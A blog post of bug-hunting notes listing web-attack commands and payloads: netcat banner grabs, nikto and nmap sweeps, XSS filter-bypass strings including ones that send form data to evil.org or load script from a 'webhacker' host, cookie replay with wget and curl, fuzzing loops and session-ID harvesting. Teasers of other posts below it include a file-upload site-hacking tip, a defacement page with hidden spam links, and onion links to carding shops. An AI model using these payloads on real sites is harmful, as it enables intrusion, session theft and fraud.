Skip to main content

Some Private Notes on Bug Hunting

Some Private Notes on Bug Hunting

Aashish Kunvar Anon haxo:
########By dorkerdevil ##############                 Hope you like it #NavinYadav bro for u n for group                                                                                                                                                                                            Hack Notes

echo -e "HEAD /HTTP/1.0\n\n" | nc -vv website.com
echo -e "HEAD /HTTP/1.0\n\n" | openssl s_client
-quit -connect website:443

nikto -p 80 -h website -verbose
whisker2.1 -p 80 -h website

enum all extensions: .asp,.aspx,.css,.htc,.htr,.htw,.ida,.idc,.idq,.printer,.shtm,.xml,.xsl

previous version of pages:~
extensions: .bak,.old,.orig,.txt
search for common directories such as:~
/bak,/inc,/old,/script

SQL connection strings:~
db=
dbconn=

~:xss payloads to check:~
<script>alert(document.cookie)</script>

1.attempt different embedding method: %3cscript%3e, %253cscript%253e, %00%3cscript%3e
<scrscriptipt>
(first “script” is removed, but “scr” + “ipt” == “script”)

2.check if injection is possible on common active tags: <script>,<object>,<applet>,<embed>,<form>

3.Non <SCRIPT> attacks:
“ [event]=‘code’
<A HREF=“exploit string”>Go</A>
resulting in:
<A HREF=““ [event]=‘code’“>Go</A>
<b onMouseOver=“self.location.href=‘http://webhacker/’
“>bolded text</b>

4.Dynamic URL attacks:
<a href=“http://trusted.org/search_main.asp?
SearchString=%22+onmouoseover%3D%27ClientForm%
2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData%
3D%22+%2B+
ClientForm%2EPersonalData%3BClientForm%
2Esubmit%3B%27”>FooBar</a>

5.Bypassing XSS filters using
encoding:
Example1:
‘) + ‘\x3cscript src=
http://webhacker/malicious.js\x3e\x3c/script\x3e’
Example2:
http://website/search.cgi?query=
%26%7balert%28%27EVIL %27%29%7d%3b&apropos=
pos2

6.Flash attacks:
For instance, instead of:
getURL(“http://www.technicalinfo.net”)
It is possible to specify scripting code:
getURL(“javascript:alert(document.cookie)”)
<EMBED
src=“http://evil.org/badflash.swf
pluginspage=“http://www.macromedia.com/shockwave/
download/index.cgi?
P1_Prod_Version=ShockwaveFlash”
type=“application/x-shockwave-flash”
width=“100”
height=“100”>
</EMBED>

*Use wget to spider a site that uses form-based authentication.
1. Use valid credentials to authenticate to site.
2. Record session cookie(s) set by the server.
3. Store session cookie in a file “session.txt”.
4. Run wget with the session cookie (this is a replay attack):
wget --load-cookies -cookies=on -r
https://website

*Use Curl and wget to spider a site that uses form-based authentication.
curl \
--verbose \
--cookie-jar cookies.txt \
--data ‘username=foo’ \ (use single quotes)
--data ‘password=bar’ \ (use single quotes)
--url https://website/login.asp
wget –load-cookies –cookies=on –r
https://website/menu.asp

*Use shell variables with Curl.
#!/bin/sh
PASS=mypassword
curl \
--verbose \
--data ‘username=barney’ \ (use single quotes)
--data “password=$PASS” \ (use double quotes)
--url https://website/login.php

*Perform “fuzzing” with Curl and Perl.
#!/bin/sh
# backticks at beginning and end of command
# single quotes around print “A” x 1000
# double quotes only around A
BUFFER=`perl –e ‘print “A” x 1000’`
curl \
--verbose \
--get \
--data “sessid=$BUFFER” \
--url http://website/boards/message.php

*Gather multiple session IDs with
Curl for off-line analysis of trends and
“randomness”.
#!/bin/sh
NAME=neo
PASS=trinity
while [ 1 ]
do
curl \
--output /dev/null \
--cookie-jar cookies.txt \
--data 'login_attempt=1' \
--data 'CustomerID=' \
--data 'CompanyName=Foundstone' \
--data "name=$NAME" \
--data "password=$PASS" \
--url http://website/auth.asp
ID=`grep identity cookies.txt`
echo "$ID" >> cookie.store
done

*Generate a PEM file for Achilles
or stunnel.
1. Use the openssl command:
openssl req -new -x509 -days 365 -nodes \
-out cert.pem -keyout cert.pem
2. Provide answers for each prompt (country, location, etc.)

*Use stunnel 3.x in client mode—accept HTTP and redirect to HTTPS.
1. Launch stunnel but do not fork. This is helpful for debugging
connections. You must have root privileges to listen on port 80,
otherwise choose a port >1024.
stunnel –f



Aashish Kunvar Anon haxo:
–P none –p stunnel.pem –c \
–d localhost:80 –r sslsite:443

*Use stunnel 4.x in client mode—accept HTTPS and redirect to HTTP.
1. Specify the certificate in the stunnel.conf file:
cert = /usr/local/etc/stunnel/stunnel.pem
2. Make sure the chroot directory specified in the stunnel.conf file exists:
chroot = /usr/local/var/run/stunnel
3. Make sure the “setuid” and “setgid” user defined in stunnel.conf has
write permissions the chroot directory:
chown –R nobody /usr/local/var/run/stunnel
chgrp –R nobody /usr/local/var/run/stunnel
4. Hint: Do not launch stunnel in daemon mode; this helps to debug
connections. In stunnel.conf add the directive:
foreground = yes
5. Place stunnel in client mode. Add the client directive outside of a
service definition (the service definition is made in step 6):
client = yes
6. Create the HTTP listener in stunnel.conf:
[http]
accept = 80
connect = sslsite:443
TIMEOUTclose = 0

*
Use stunnel 3.x in server mode—accept HTTPS and redirect to HTTP.
1. Launch stunnel but do not fork. This is helpful for debugging
connections. You must have root privileges to listen on port 443,
otherwise choose a port >1024.
stunnel –f –P none –p stunnel.pem \
–d localhost:443 –r website:80

*Use stunnel 4.x in server mode—accept HTTPS and redirect to HTTP.
1. Specify the certificate in the stunnel.conf file:
cert = /usr/local/etc/stunnel/stunnel.pem
2. Make sure the chroot directory specified in the stunnel.conf file exists:
chroot = /usr/local/var/run/stunnel
3. Make sure the “setuid” and “setgid” user defined in stunnel.conf has
write permissions the chroot directory:
chown –R nobody /usr/local/var/run/stunnel
chgrp –R nobody /usr/local/var/run/stunnel
4. Hint: Do not launch stunnel in daemon mode; this helps to debug
connections. In stunnel.conf add the directive:
foreground = yes
5. Create the HTTPS listener in stunnel.conf:
[https]
accept = 443
connect = website:80
TIMEOUTclose = 0

*Use Nikto against a range of IP addresses.
1. Generate file that contains list of web servers listening on port 80:
nmap -P0 -p 80 -oG temp.txt 10.20.0.0/16
grep open temp.txt | cut -d' ' -f2 > targets.txt
2. Create looping shell script:
#!/bin/sh
# nikto-loop.sh
for IP in cat $1 (use back ticks)
do
./nikto.pl –verbose –w –p 80 -h $IP \
–o results/nikto.$IP.html
done
3. Launch Nikto:
mkdir results
./nikto-loop.sh targets.txt

Hope you like it more to come github.com/dorkerdevil

Labels:

Comments

  1. Dorker Devil9 October 2017 at 06:37

    Dude write my name correctly , its not anon Haxor ok Just Ashish Kunwar, correct it

    ReplyDelete

Post a Comment

Popular posts from this blog

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS http://answers.microsoft.com/en-us http://archiveoflinks.com / http://community.sitepoint.com / http://de.lirio.us / http://del.icio.us / http://dondir.com / http://filesharingtalk.com / http://forum.deviantart.com / http://forum.joomla.org / http://forums.cnet.com / http://forums.hostgator.com / http://forums.mysql.com / http://forums.searchenginewatch.com / http://simplemachines.org/community/index.php http://www.247webdirectory.com / http://www.2daydir.com / http://www.9dir.com/Submit http://www.9sites.net / http://www.9w1.net / http://www.a1webdirectory.org / http://www.abacusseo.com / http://www.abc-directory.com / http://www.abigdir.com / http://www.acewebdirectory.com / http://www.add2us.com / http://www.addbusiness.net / http://www.addlink.us / http://www.addlinkzfree.com / http://www.addsite.info / http://www.afreeurl.info / http://www.agrieducation.org / http://www.alistdirectory.com / http...
Post a Comment
Read more
200++ high pr eductinon&goverment site backline As We know how important backlinks are for rankings in Google for a blog/site and page rank which definitely is the trusted way to show how well your blog is which most advertiser look for.I have come up with top .gov & .edu website by registering where you can get backlinks easily.Sograb these backlinsk and see the magic how  your website ranks on Google with these high PR boosting .gov and .edu backlinks.A high quality backlinks worth thousands low quality backlinks, especially the one coming fromedu and .gov sites. Google loves backlinks from.edu & .gov sites and thus give your site good ranking in SERPs. An edu & .’gov backlinks is associated with an educational institute & government organization therefore considered asmost authentic and valued backlink in term of SEO because they are from non-profit source givequality information, not a spam one and since exists for long time in the field, have high ...
Post a Comment
Read more

How to Hack Website

inurl:/editor/editor/filemanager Just open uploadtest.html Or test.html Then select PHP server Upload file Copy uploaded file url Paste it after the link Www.xyz.com //.... Enjoy Regards :- HACKER 22385
Post a Comment
Read more

Abdul hacker deface page

Abdul hacker deface page     <EMBED src=" http://greencall.co.kr/.p/we_will_not_go_down.swf " type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">     <html>         <body onload="scrlsts()"><script type="text/javascript"> document.write('<' + 'di' + 'v sty' + 'le="position: absolute; l' + 'eft: -1946px; t' + 'op' + ': -2856px;" class="sufoxyyhvnyswxs15">'); </script> <a href=" http://cergyd7.dev2.cmantika.com/includes/index.php ">installment loans california bad credit</a> <a href=" http://www.diamondwares.net/logs/index.php ">online cash loan direct lenders</a> <a href=" http://armastroy.com/templates/index.php ">easy loan kota kinabalu</a> <a href=" http://www.magazinecambodia.com/templates/index....
Post a Comment
Read more

Blogs on Computer Security:

Blogs on Computer Security: https://antelox.blogspot.com / http://www.dumpanalysis.org/blog / http://www.abuse.ch / http://zairon.wordpress.com / http://androguard.blogspot.com / http://blog.w4kfu.com / http://akhenath0n.blogspot.com / http://diarrlf.wordpress.com / http://deobfuscated.blogspot.com / http://www.h-i-r.net / http://mysterie.fr/blog / http://www.skullsecurity.org/blog / http://www.wrgross.com/blogs/security / http://net-effects.blogspot.com / http://eiploader.wordpress.com / http://cyb3rsleuth.blogspot.com / http://0entropy.blogspot.com / http://siri-urz.blogspot.com / http://newsoft-tech.blogspot.com / http://www.ragestorm.net/blogs / http://codeexploration.blogspot.com / http://esploit.blogspot.com / http://thexploit.com / http://mysterie.fr/blog / http://bailey.st/blog / http://touchmymalware.blogspot.ru / http://blog.delroth.net / http://novahackers.blogspot.com / http://greatis.com/blog / http://mcdermottcybersecurity.com / http://grand...
1 comment
Read more

Various Forums

JuanDeLemos: 1. Kali Linux http://distrowatch.com/kali   http://www.kali.org/  http://forums.kali.org/ Kali Linux (formerly known as BackTrack) is a Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture, a choice of four popular desktop environments, and seamless upgrades to newer versions. 2. Tails  http://distrowatch.com/tails  https://tails.boum.org/  https://tails.boum.org/support/index.en.html https://mailman.boum.org/listinfo/ The Amnesic Incognito Live System (Tails) is a Debian-based live CD/USB with the goal of providing complete Internet anonymity for the user. The product ships with several Internet applications, including web browser, IRC client, mail client and instant messenger, all pre-configured with security in mind and with all traffic anonymised. To achieve this, Incognito uses the Tor network to make Internet traffic very hard to trace...
Post a Comment
Read more

Darkweb and Deepweb llinks latest 2017 Huge collection!!!!

hi guys... as u know deep web and darkweb is most dangeorus part of the internet... but without site link....what where will u surf it ... so i did some reasearch and get the collection.... hope u like it.. Gonzalo Nuñez: 1. Xillia (was legit back in the day on markets) http://cjgxp5lockl6aoyg.onion 2. http://cjgxp5lockl6aoyg.onion/worldwide-cardable-sites-by-alex 3. http://cjgxp5lockl6aoyg.onion/selling-paypal-accounts-with-balance-upto-5000dollars 4. http://cjgxp5lockl6aoyg.onion/cloned-credit-cards-free-shipping 5. 6. ——————————————————————————————- 7. 8. 9. UNSORTED 10. 11. Amberoad http://amberoadychffmyw.onion 12. KognitionsKyrkan http://wd43uqrbjwe6hpre.onion 13. Malina http://malina2ihfyawiau.onion 14. BB Compendium http://jq.26zp5ygkpszripvv.onion 15. Hackbb pages index (cauti...
Post a Comment
Read more

hacking tools and lab

Resources (Free) Virtual Networks (VPNs) • ChaosVPN: http://wiki.hamburg.ccc.de/ChaosVPN • Gh0st Networks: http://www.gh0st.net / • Hacking Lab: https://www.hacking-lab.com / • p0wnlabs: http://p0wnlabs.com / • pwn0: https://pwn0.com / • PentestIT: https://lab.pentestit.ru / Custom Personal Targets • Hack A Server: https://hackaserver.com / • Hack Me: http://hack.me / • Hack This: https://www.hackthis.co.uk / • Smash The Stack: http://smashthestack.org / • Hack The Box: https://www.hackthebox.gr / • SecAdvise: https://labs.secadvise.com / • DarkHive: http://darkhive.net / • Avatao: https://avatao.com / • Root-Me: https://www.root-me.org / Archive/Repository • Security Conference Library: http://archive.liquidmatrix.org / • Shell-Storm.org Repository: http://repo.shell-storm.org/CTF / Misc • Bug crowd: ht...
4 comments
Read more

open a new bitcoin account and made double money

open a new bitcoin account and made double money MenuAbout UsContact Us Privacy Policy Disclaimer Sitemap  Main MenuBlogging tipsBlog designing  Blog traffic How TosMake Money Online  How to open a bitcoin account, earn, double your earnings and withdraw your money to physical cash. Bloggers Prof 11:12:00 AM  4 I recently discovered that people are now interested in bitcoin because of its high rate of popularity now in telegram, but nevertheless, I would be talking today on  how to get money into your bitcoin wallet  and how to go about your funds, weather you would withdraw it or you sell it to someone, I talked about everything you need to know about bitcoin and how to create your wallet, create your wallet let's move to today's deal. There are many ways to get  money into your wallet,   you can buy and you can also earn it , I want to show you list of sites you can earn bits from fast, Afte...
Post a Comment
Read more

Tor Darkweb Link

Tor link max telegram big acker: https://cardedlxzxsphu5y.onion/ SHOP FOR BUYING CARDED PRODUCTS https://2or24opd2hkebadv.onion/index.php  TORBAY FORUM chickencaptain: http://kpynyvym6xqi7wz2.onion/ parazite files and links max telegram big acker: https://kr5hou2zh4qtebqk.onion.cab/ezines/ ARCHIEVE OF SOME VINTAGE AS WELL AS NEW STUFFS https://superkuhbitj6tul.onion/library/ LIBRARY OF BOOKS ON VARIOUS TOPICS https://yuxv6qujajqvmypv.onion/ GUIDE ON USING AN SECURE OPERATING SYSTEM https://bpo4ybbs2apk4sk4.onion/en A COLLECTION OF TOOLS RELATED TO SECURITY P4RN3R: https://ondemand5xot4hdw.onion/  Tor On Demand max telegram big acker: https://f3mnl42ax3qtu3a7.onion/ GOVT LEAKS https://kzspryu63qbjfncp.onion/  DIGITAL PAWN SHOP https://yniir5c6cmuwslfl.onion/ STRANGE WEBSITE, CANT DESCRIBE https://vrimutd6so6a565x.onion.cab/index.php/Board ANONYMOUS POSTING https://h2am5w5ufhvdifrs.onion/ CRYPTOME ARCHIVE OF GOV CONSPIRACY FILES https://torc5bhzq6xorhb4.o...
Post a Comment
Read more